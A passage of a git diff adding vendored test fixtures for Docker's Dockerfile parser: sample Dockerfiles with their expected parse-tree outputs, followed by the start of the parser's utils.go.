b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile @@ -0,0 +1,7 @@ +# escape = `` +# There is no white space line after the directives. This still succeeds, but goes +# against best practices. 
+FROM image +MAINTAINER foo@bar.com +ENV GOPATH ` +\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result new file mode 100644 index 0000000000..21522a880b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result @@ -0,0 +1,3 @@ +(from "image") +(maintainer "foo@bar.com") +(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile new file mode 100644 index 0000000000..ef30414a5e --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile @@ -0,0 +1,6 @@ +#escape = ` + +FROM image +MAINTAINER foo@bar.com +ENV GOPATH ` +\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result new file mode 100644 index 0000000000..21522a880b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result @@ -0,0 +1,3 @@ +(from "image") +(maintainer "foo@bar.com") +(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile new file mode 100644 index 0000000000..1ffb17ef08 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile @@ -0,0 +1,14 @@ +FROM ubuntu:14.04 +MAINTAINER Erik \\Hollensbe \" + +RUN apt-get \update && \ + apt-get \"install znc -y +ADD \conf\\" /.znc + +RUN foo \ + +bar \ + +baz + +CMD [ "\/usr\\\"/bin/znc", "-f", "-r" ] diff --git 
a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result new file mode 100644 index 0000000000..13e409cb1a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result @@ -0,0 +1,6 @@ +(from "ubuntu:14.04") +(maintainer "Erik \\\\Hollensbe \\\"") +(run "apt-get \\update && apt-get \\\"install znc -y") +(add "\\conf\\\\\"" "/.znc") +(run "foo bar baz") +(cmd "/usr\\\"/bin/znc" "-f" "-r") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile new file mode 100644 index 0000000000..2418e0f069 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile @@ -0,0 +1,10 @@ +FROM scratch +COPY foo /tmp/ +COPY --user=me foo /tmp/ +COPY --doit=true foo /tmp/ +COPY --user=me --doit=true foo /tmp/ +COPY --doit=true -- foo /tmp/ +COPY -- foo /tmp/ +CMD --doit [ "a", "b" ] +CMD --doit=true -- [ "a", "b" ] +CMD --doit -- [ ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result new file mode 100644 index 0000000000..4578f4cba4 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result @@ -0,0 +1,10 @@ +(from "scratch") +(copy "foo" "/tmp/") +(copy ["--user=me"] "foo" "/tmp/") +(copy ["--doit=true"] "foo" "/tmp/") +(copy ["--user=me" "--doit=true"] "foo" "/tmp/") +(copy ["--doit=true"] "foo" "/tmp/") +(copy "foo" "/tmp/") +(cmd ["--doit"] "a" "b") +(cmd ["--doit=true"] "a" "b") +(cmd ["--doit"]) diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile new file mode 
100644 index 0000000000..081e442882 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile @@ -0,0 +1,10 @@ +FROM debian +ADD check.sh main.sh /app/ +CMD /app/main.sh +HEALTHCHECK +HEALTHCHECK --interval=5s --timeout=3s --retries=3 \ + CMD /app/check.sh --quiet +HEALTHCHECK CMD +HEALTHCHECK CMD a b +HEALTHCHECK --timeout=3s CMD ["foo"] +HEALTHCHECK CONNECT TCP 7000 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result new file mode 100644 index 0000000000..092924f88c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result @@ -0,0 +1,9 @@ +(from "debian") +(add "check.sh" "main.sh" "/app/") +(cmd "/app/main.sh") +(healthcheck) +(healthcheck ["--interval=5s" "--timeout=3s" "--retries=3"] "CMD" "/app/check.sh --quiet") +(healthcheck "CMD") +(healthcheck "CMD" "a b") +(healthcheck ["--timeout=3s"] "CMD" "foo") +(healthcheck "CONNECT" "TCP 7000") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile new file mode 100644 index 0000000000..587fb9b54b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile @@ -0,0 +1,15 @@ +FROM ubuntu:14.04 + +RUN apt-get update && apt-get install wget -y +RUN wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb +RUN dpkg -i influxdb_latest_amd64.deb +RUN rm -r /opt/influxdb/shared + +VOLUME /opt/influxdb/shared + +CMD /usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml + +EXPOSE 8083 +EXPOSE 8086 +EXPOSE 8090 +EXPOSE 8099 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result 
b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result new file mode 100644 index 0000000000..0998e87e63 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result @@ -0,0 +1,11 @@ +(from "ubuntu:14.04") +(run "apt-get update && apt-get install wget -y") +(run "wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb") +(run "dpkg -i influxdb_latest_amd64.deb") +(run "rm -r /opt/influxdb/shared") +(volume "/opt/influxdb/shared") +(cmd "/usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml") +(expose "8083") +(expose "8086") +(expose "8090") +(expose "8099") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile new file mode 100644 index 0000000000..39fe27d99c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile @@ -0,0 +1 @@ +CMD "[\"echo\", \"Phew, I just managed to escaped those double quotes\"]" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result new file mode 100644 index 0000000000..afc220c2a7 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result @@ -0,0 +1 @@ +(cmd "\"[\\\"echo\\\", \\\"Phew, I just managed to escaped those double quotes\\\"]\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile 
b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile new file mode 100644 index 0000000000..eaae081a06 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile @@ -0,0 +1 @@ +CMD '["echo", "Well, JSON in a string is JSON too?"]' diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result new file mode 100644 index 0000000000..484804e2b2 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result @@ -0,0 +1 @@ +(cmd "'[\"echo\", \"Well, JSON in a string is JSON too?\"]'") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile new file mode 100644 index 0000000000..c3ac63c07a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile @@ -0,0 +1 @@ +CMD ['echo','single quotes are invalid JSON'] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result new file mode 100644 index 0000000000..6147891207 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result @@ -0,0 +1 @@ +(cmd "['echo','single quotes are invalid JSON']") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile 
b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile new file mode 100644 index 0000000000..5fd4afa522 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile @@ -0,0 +1 @@ +CMD ["echo", "Please, close the brackets when you're done" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result new file mode 100644 index 0000000000..1ffbb8ff85 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result @@ -0,0 +1 @@ +(cmd "[\"echo\", \"Please, close the brackets when you're done\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile new file mode 100644 index 0000000000..30cc4bb48f --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile @@ -0,0 +1 @@ +CMD ["echo", "look ma, no quote!] 
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result new file mode 100644 index 0000000000..32048147b5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result @@ -0,0 +1 @@ +(cmd "[\"echo\", \"look ma, no quote!]") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile new file mode 100644 index 0000000000..a586917110 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile @@ -0,0 +1,8 @@ +CMD [] +CMD [""] +CMD ["a"] +CMD ["a","b"] +CMD [ "a", "b" ] +CMD [ "a", "b" ] +CMD [ "a", "b" ] +CMD ["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result new file mode 100644 index 0000000000..c6553e6e1a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result @@ -0,0 +1,8 @@ +(cmd) +(cmd "") +(cmd "a") +(cmd "a" "b") +(cmd "a" "b") +(cmd "a" "b") +(cmd "a" "b") +(cmd "abc 123" "♥" "☃" "\" \\ / \b \f \n \r \t \x00") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile new file mode 100644 index 0000000000..35f9c24aa6 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile @@ -0,0 +1,7 @@ +FROM ubuntu:14.04 +MAINTAINER James Turnbull "james@example.com" +ENV REFRESHED_AT 2014-06-01 
+RUN apt-get update +RUN apt-get -y install redis-server redis-tools +EXPOSE 6379 +ENTRYPOINT [ "/usr/bin/redis-server" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result new file mode 100644 index 0000000000..b5ac6fe445 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result @@ -0,0 +1,7 @@ +(from "ubuntu:14.04") +(maintainer "James Turnbull \"james@example.com\"") +(env "REFRESHED_AT" "2014-06-01") +(run "apt-get update") +(run "apt-get -y install redis-server redis-tools") +(expose "6379") +(entrypoint "/usr/bin/redis-server") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile new file mode 100644 index 0000000000..188395fe83 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile @@ -0,0 +1,48 @@ +FROM busybox:buildroot-2014.02 + +MAINTAINER docker + +ONBUILD RUN ["echo", "test"] +ONBUILD RUN echo test +ONBUILD COPY . / + + +# RUN Commands \ +# linebreak in comment \ +RUN ["ls", "-la"] +RUN ["echo", "'1234'"] +RUN echo "1234" +RUN echo 1234 +RUN echo '1234' && \ + echo "456" && \ + echo 789 +RUN sh -c 'echo root:testpass \ + > /tmp/passwd' +RUN mkdir -p /test /test2 /test3/test + +# ENV \ +ENV SCUBA 1 DUBA 3 +ENV SCUBA "1 DUBA 3" + +# CMD \ +CMD ["echo", "test"] +CMD echo test +CMD echo "test" +CMD echo 'test' +CMD echo 'test' | wc - + +#EXPOSE\ +EXPOSE 3000 +EXPOSE 9000 5000 6000 + +USER docker +USER docker:root + +VOLUME ["/test"] +VOLUME ["/test", "/test2"] +VOLUME /test3 + +WORKDIR /test + +ADD . / +COPY . 
copy diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result new file mode 100644 index 0000000000..6f7d57a396 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result @@ -0,0 +1,29 @@ +(from "busybox:buildroot-2014.02") +(maintainer "docker ") +(onbuild (run "echo" "test")) +(onbuild (run "echo test")) +(onbuild (copy "." "/")) +(run "ls" "-la") +(run "echo" "'1234'") +(run "echo \"1234\"") +(run "echo 1234") +(run "echo '1234' && echo \"456\" && echo 789") +(run "sh -c 'echo root:testpass > /tmp/passwd'") +(run "mkdir -p /test /test2 /test3/test") +(env "SCUBA" "1 DUBA 3") +(env "SCUBA" "\"1 DUBA 3\"") +(cmd "echo" "test") +(cmd "echo test") +(cmd "echo \"test\"") +(cmd "echo 'test'") +(cmd "echo 'test' | wc -") +(expose "3000") +(expose "9000" "5000" "6000") +(user "docker") +(user "docker:root") +(volume "/test") +(volume "/test" "/test2") +(volume "/test3") +(workdir "/test") +(add "." "/") +(copy "." 
"copy") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile new file mode 100644 index 0000000000..f64c1168c1 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile @@ -0,0 +1,16 @@ +FROM ubuntu:14.04 + +RUN apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y +ADD .muttrc / +ADD .offlineimaprc / +ADD .tmux.conf / +ADD mutt /.mutt +ADD vim /.vim +ADD vimrc /.vimrc +ADD crontab /etc/crontab +RUN chmod 644 /etc/crontab +RUN mkdir /Mail +RUN mkdir /.offlineimap +RUN echo "export TERM=screen-256color" >/.zshenv + +CMD setsid cron; tmux -2 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result new file mode 100644 index 0000000000..a0efcf04b6 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result @@ -0,0 +1,14 @@ +(from "ubuntu:14.04") +(run "apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y") +(add ".muttrc" "/") +(add ".offlineimaprc" "/") +(add ".tmux.conf" "/") +(add "mutt" "/.mutt") +(add "vim" "/.vim") +(add "vimrc" "/.vimrc") +(add "crontab" "/etc/crontab") +(run "chmod 644 /etc/crontab") +(run "mkdir /Mail") +(run "mkdir /.offlineimap") +(run "echo \"export TERM=screen-256color\" >/.zshenv") +(cmd "setsid cron; tmux -2") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile new file mode 100644 index 0000000000..57bb5976a3 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile @@ -0,0 +1,3 @@ +FROM foo + +VOLUME 
/opt/nagios/var /opt/nagios/etc /opt/nagios/libexec /var/log/apache2 /usr/share/snmp/mibs diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result new file mode 100644 index 0000000000..18dbdeeaa0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result @@ -0,0 +1,2 @@ +(from "foo") +(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile new file mode 100644 index 0000000000..5b9ec06a6c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile @@ -0,0 +1,7 @@ +FROM ubuntu:14.04 + +RUN apt-get update && apt-get install libcap2-bin mumble-server -y + +ADD ./mumble-server.ini /etc/mumble-server.ini + +CMD /usr/sbin/murmurd diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result new file mode 100644 index 0000000000..a0036a943e --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result @@ -0,0 +1,4 @@ +(from "ubuntu:14.04") +(run "apt-get update && apt-get install libcap2-bin mumble-server -y") +(add "./mumble-server.ini" "/etc/mumble-server.ini") +(cmd "/usr/sbin/murmurd") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile new file mode 100644 index 0000000000..bf8368e1ca --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile @@ -0,0 +1,14 @@ +FROM 
ubuntu:14.04 +MAINTAINER Erik Hollensbe + +RUN apt-get update && apt-get install nginx-full -y +RUN rm -rf /etc/nginx +ADD etc /etc/nginx +RUN chown -R root:root /etc/nginx +RUN /usr/sbin/nginx -qt +RUN mkdir /www + +CMD ["/usr/sbin/nginx"] + +VOLUME /www +EXPOSE 80 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result new file mode 100644 index 0000000000..56ddb6f258 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result @@ -0,0 +1,11 @@ +(from "ubuntu:14.04") +(maintainer "Erik Hollensbe ") +(run "apt-get update && apt-get install nginx-full -y") +(run "rm -rf /etc/nginx") +(add "etc" "/etc/nginx") +(run "chown -R root:root /etc/nginx") +(run "/usr/sbin/nginx -qt") +(run "mkdir /www") +(cmd "/usr/sbin/nginx") +(volume "/www") +(expose "80") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile new file mode 100644 index 0000000000..72b79bdd7d --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile @@ -0,0 +1,23 @@ +FROM ubuntu:12.04 + +EXPOSE 27015 +EXPOSE 27005 +EXPOSE 26901 +EXPOSE 27020 + +RUN apt-get update && apt-get install libc6-dev-i386 curl unzip -y +RUN mkdir -p /steam +RUN curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam +ADD ./script /steam/script +RUN /steam/steamcmd.sh +runscript /steam/script +RUN curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf +RUN curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf +ADD ./server.cfg /steam/tf2/tf/cfg/server.cfg +ADD ./ctf_2fort.cfg /steam/tf2/tf/cfg/ctf_2fort.cfg +ADD ./sourcemod.cfg /steam/tf2/tf/cfg/sourcemod/sourcemod.cfg 
+RUN rm -r /steam/tf2/tf/addons/sourcemod/configs +ADD ./configs /steam/tf2/tf/addons/sourcemod/configs +RUN mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en +RUN cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en + +CMD cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result new file mode 100644 index 0000000000..d4f94cd8be --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result @@ -0,0 +1,20 @@ +(from "ubuntu:12.04") +(expose "27015") +(expose "27005") +(expose "26901") +(expose "27020") +(run "apt-get update && apt-get install libc6-dev-i386 curl unzip -y") +(run "mkdir -p /steam") +(run "curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam") +(add "./script" "/steam/script") +(run "/steam/steamcmd.sh +runscript /steam/script") +(run "curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf") +(run "curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf") +(add "./server.cfg" "/steam/tf2/tf/cfg/server.cfg") +(add "./ctf_2fort.cfg" "/steam/tf2/tf/cfg/ctf_2fort.cfg") +(add "./sourcemod.cfg" "/steam/tf2/tf/cfg/sourcemod/sourcemod.cfg") +(run "rm -r /steam/tf2/tf/addons/sourcemod/configs") +(add "./configs" "/steam/tf2/tf/addons/sourcemod/configs") +(run "mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en") +(run "cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en") +(cmd "cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script 
+tf_bot_quota 12 +tf_bot_quota_mode fill") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile new file mode 100644 index 0000000000..4842088166 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile @@ -0,0 +1,9 @@ +FROM ubuntu:14.04 + +RUN apt-get update -qy && apt-get install tmux zsh weechat-curses -y + +ADD .weechat /.weechat +ADD .tmux.conf / +RUN echo "export TERM=screen-256color" >/.zshenv + +CMD zsh -c weechat diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result new file mode 100644 index 0000000000..c3abb4c54f --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result @@ -0,0 +1,6 @@ +(from "ubuntu:14.04") +(run "apt-get update -qy && apt-get install tmux zsh weechat-curses -y") +(add ".weechat" "/.weechat") +(add ".tmux.conf" "/") +(run "echo \"export TERM=screen-256color\" >/.zshenv") +(cmd "zsh -c weechat") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile new file mode 100644 index 0000000000..3a4da6e916 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile @@ -0,0 +1,7 @@ +FROM ubuntu:14.04 +MAINTAINER Erik Hollensbe + +RUN apt-get update && apt-get install znc -y +ADD conf /.znc + +CMD [ "/usr/bin/znc", "-f", "-r" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result new file mode 100644 index 0000000000..5493b255fd --- /dev/null +++ 
b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result @@ -0,0 +1,5 @@ +(from "ubuntu:14.04") +(maintainer "Erik Hollensbe ") +(run "apt-get update && apt-get install znc -y") +(add "conf" "/.znc") +(cmd "/usr/bin/znc" "-f" "-r") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go new file mode 100644 index 0000000000..cd7af75e79 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go @@ -0,0 +1,176 @@ +package parser + +import ( + "fmt" + "strconv" + "strings" + "unicode" +) + +// Dump dumps the AST defined by `node` as a list of sexps. +// Returns a string suitable for printing. +func (node *Node) Dump() string { + str := "" + str += node.Value + + if len(node.Flags) > 0 { + str += fmt.Sprintf(" %q", node.Flags) + } + + for _, n := range node.Children { + str += "(" + n.Dump() + ")\n" + } + + if node.Next != nil { + for n := node.Next; n != nil; n = n.Next { + if len(n.Children) > 0 { + str += " " + n.Dump() + } else { + str += " " + strconv.Quote(n.Value) + } + } + } + + return strings.TrimSpace(str) +} + +// performs the dispatch based on the two primal strings, cmd and args. Please +// look at the dispatch table in parser.go to see how these dispatchers work. +func fullDispatch(cmd, args string, d *Directive) (*Node, map[string]bool, error) { + fn := dispatch[cmd] + + // Ignore invalid Dockerfile instructions + if fn == nil { + fn = parseIgnore + } + + sexp, attrs, err := fn(args, d) + if err != nil { + return nil, nil, err + } + + return sexp, attrs, nil +} + +// splitCommand takes a single line of text and parses out the cmd and args, +// which are used for dispatching to more exact parsing functions. 
+func splitCommand(line string) (string, []string, string, error) { + var args string + var flags []string + + // Make sure we get the same results irrespective of leading/trailing spaces + cmdline := tokenWhitespace.Split(strings.TrimSpace(line), 2) + cmd := strings.ToLower(cmdline[0]) + + if len(cmdline) == 2 { + var err error + args, flags, err = extractBuilderFlags(cmdline[1]) + if err != nil { + return "", nil, "", err + } + } + + return cmd, flags, strings.TrimSpace(args), nil +} + +// covers comments and empty lines. Lines should be trimmed before passing to +// this function. +func stripComments(line string) string { + // string is already trimmed at this point + if tokenComment.MatchString(line) { + return tokenComment.ReplaceAllString(line, "") + } + + return line +} + +func extractBuilderFlags(line string) (string, []string, error) { + // Parses the BuilderFlags and returns the remaining part of the line + + const ( + inSpaces = iota // looking for start of a word + inWord + inQuote + ) + + words := []string{} + phase := inSpaces + word := "" + quote := '\000' + blankOK := false + var ch 